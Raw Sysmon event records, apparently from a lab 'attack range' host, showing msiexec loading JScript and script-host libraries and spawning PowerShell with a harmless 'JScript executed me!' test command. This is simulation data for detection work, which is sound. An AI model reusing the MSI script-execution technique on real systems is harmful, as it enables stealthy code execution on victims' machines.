AUTHORITY\SYSTEM 12241200x80000000000000002696664Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.303{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002696663Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.303{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 23542300x80000000000000002696662Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.303{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5147.msiMD5=47B535A9C2480FAD4788850FF2AE76D2,SHA256=3293A5CB821F391F6B0E1328D23B15047C4A43EFBFEEF5FEA057DBACDBD68D85falsetrue 10341000x80000000000000002696277Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}31883088C:\Windows\System32\MsiExec.exe{7CF983DC-9827-62AC-3D6B-000000006202}2588C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002696276Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.052{7CF983DC-9827-62AC-3D6B-000000006202}2588C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host JScript executed me!; exitC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\MsiExec.exe -Embedding C2200B2A80695614509AECEE4CBDCC3CWIN-HOST-MHAAG-\Administrator 13241300x80000000000000002696275Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002696274Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002696273Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002696272Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 10341000x80000000000000002696271Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.037{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002696270Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.037{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696269Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002696268Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696267Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696266Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1ECtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696265Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\iertutil.dll11.00.14393.5006 (rs1_release.220301-1704)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=153A3C6C45E23363BC842795FD49E7A3,SHA256=06DFA7248890579938106FF7527BB8FD0091A24D1C1667CB6583A4D239885141trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696264Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\urlmon.dll11.00.14393.5006 (rs1_release.220301-1704)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=72DA72C24A0AD3C49AC956DC083EEDF3,SHA256=2DB817631EC24840FDED7C584BC08F03D3549D93552C8E20005E18BA5E81CA12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696263Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\edputil.dll10.0.14393.2608 (rs1_release.181024-1742)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=75AC86B00CE4C64B02B105A55CA35628,SHA256=DB31A2345E3BB8DC79BFB4CC29615E3B8B7638AE80BFEC45FA57852669A592AEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002696262Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.037{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManagerWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002696261Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002696260Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696259Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=087C47C19BBFCB9F4932C03C0189E86B,SHA256=9BEE35FBFA2E595372D82E8858BE46CE7717E0399996960398BC238F4D0E5207trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696258Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696257Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\sxs.dll10.0.14393.4169 (rs1_release.210107-1130)Fusion 2.5Microsoft® Windows® Operating SystemMicrosoft CorporationSXS.DLLMD5=54FB18CA661D074CBB60D5A58D40C8D3,SHA256=A2BD6160222A216F8A6830C1273662F8AE88F53D2CE6DA5893FF70D146A0A2B0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696256Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696255Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\scrrun.dll5.812.10240.16384Microsoft ® Script RuntimeMicrosoft ® Script RuntimeMicrosoft Corporationscrrun.dllMD5=6E948305B041BE52E45E9E942C78A3F4,SHA256=93C4A201E3627E617C478054BAB472553CF48B84C32DE2F0A316F30F4A61A782trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696254Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\mpr.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Multiple Provider Router DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmpr.dllMD5=0E56DB60C434D51769F2DAC48B9AA686,SHA256=3F9AED98B1B7F6A59C219F622FD91C7FD20BFE280935F5334920A02ECCAE7ED6trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696253Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\wshom.ocx5.812.10240.16384Windows Script Host Runtime LibraryMicrosoft ® Windows Script Host Runtime LibraryMicrosoft Corporationwshom.ocxMD5=012C02BB5DD8EC0FD4AC2688D8D4D0CF,SHA256=B73B3C361F6B07960B092485CE8C96A4E68F741D718C6E847FF37C5BA5227C18trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002696252Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002696251Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696250Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002696249Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows Script\SettingsWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696248Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696247Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\jscript.dll5.812.10240.16384Microsoft ® JScriptMicrosoft ® JScriptMicrosoft Corporationjscript.dllMD5=017AA3E55F15439E32C6F461E5686CCD,SHA256=8117D34017F6F90BC9DC68E3F79346E62E389AFE9E154FF0FCB99FB921845486trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696246Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696245Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002696244Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.022{7CF983DC-9826-62AC-3C6B-000000006202}31884232C:\Windows\System32\MsiExec.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\MsiExec.exe+6bca|C:\Windows\System32\MsiExec.exe+7166|C:\Windows\System32\MsiExec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000002696243Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696242Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696241Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696240Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696239Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696238Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696237Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696236Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002696235Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696234Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696233Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls 